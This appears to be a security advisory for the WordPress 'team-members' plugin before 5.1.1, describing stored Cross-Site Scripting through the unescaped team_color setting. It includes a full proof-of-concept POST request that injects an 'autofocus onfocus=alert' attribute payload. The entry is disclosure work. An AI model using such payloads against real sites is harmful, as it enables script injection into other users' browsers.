The plugin does not escape some of its Team settings, which could allow high privilege users such as admin to perform Cross-Site Scripting attacks even when unfiltered_html is disallowed
The team_color field (ie “Main color” setting of a team) is affected POST /wp-admin/post.php HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 799 Connection: close Cookie: [admin+] Upgrade-Insecure-Requests: 1 _wpnonce=13207515fa&user;_ID=1&action;=editpost&originalaction;=editpost&post;_author=1&post;_type=tmm&original;_post_status=auto-draft&auto;_draft=&post;_ID=6069&meta-box-order-nonce;=66d1e9f3bf&closedpostboxesnonce;=148d1a7663&post;_title=Test&samplepermalinknonce;=25926b035a&team;_columns=3&team;_piclink_beh=new&team;_force_font=yes&team;_color=%2381d742%22%20autofocus%20onfocus%3dalert(%2fXSS2%2f)%2f%2f&save;=Save+Draft&hidden;_post_status=draft&post;_status=draft&hidden;_post_password=&hidden;_post_visibility=public&visibility;=public&post;_password=&mm;=05&jj;=04&aa;=2022&hh;=08&mn;=02&ss;=58&hidden;_mm=05&cur;_mm=05&hidden;_jj=04&cur;_jj=04&hidden;_aa=2022&cur;_aa=2022&hidden;_hh=08&cur;_hh=08&hidden;_mn=02&cur;_mn=02&original;_publish=Publish&dmb;_tmm_meta_box_nonce=92f792d2d0&dmb;_editor=&tmm;_data_dumps%5B%5D=&post;_name=
CPE | Name | Operator | Version |
---|---|---|---|
team-members | lt | 5.1.1 |